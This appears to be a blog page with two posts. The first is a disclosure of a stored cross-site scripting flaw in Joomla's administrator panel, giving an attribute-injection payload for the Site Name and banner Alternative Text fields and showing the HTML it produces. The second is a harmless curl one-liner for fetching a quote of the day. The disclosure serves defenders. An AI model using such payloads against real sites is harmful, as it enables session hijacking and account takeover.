Sent a report to the joomla! strike tream but have never received a response.
Seems like the vuln is not critical.
To trigger these xss(es) vuln you will need access to the administrative panel. Since the vuln(s) are basically the same but are in different parameters I’ll be showing an example to just one.
1) Go to the Global Configuration page:
2) Type in the following payload in “Site Name”
" onclick=alert(1) test="
<header class="header"> <div class="container-logo"> <img src="/joomla/administrator/templates/isis/images/logo.png" class="logo" alt="" onclick="alert(1)" test=""> <span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span> </div>
<a class="brand pull-left" href="/joomla"> <span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span> </a> <div class="header-search pull-right">
There are many other parameters in the admin panel that is vulnerable. Another example would be the “Banner” page. Entering the exact same payload as the one above in “Alternative Text” input box will also trigger js when the banner is clicked. Web admins that allow staffs to edit banners should be aware of this vuln as this could lead to an account takeover or something more serious.
I was messing up with the GeekTool on Mac OSX and decided to write some bash commands to grab the quote of the day from brainyquote.com. I did a google search afterwards, sadly someone already did it. Well, here’s mine grabbing from quotebr.js instead of the actual html.
curl -s www.brainyquote.com/link/quotebr.js | sed -n '3p' | sed -e 's/br.writeln("//g' -e 's/<br>");//g'|tr '\n' ' ' && printf " -" &&curl -s www.brainyquote.com/link/quotebr.js | sed -n '4p' | grep -o "\\\">.*" | sed -e 's/">//g' -e 's/<\/a>");//g'
Here’s the link to the other one: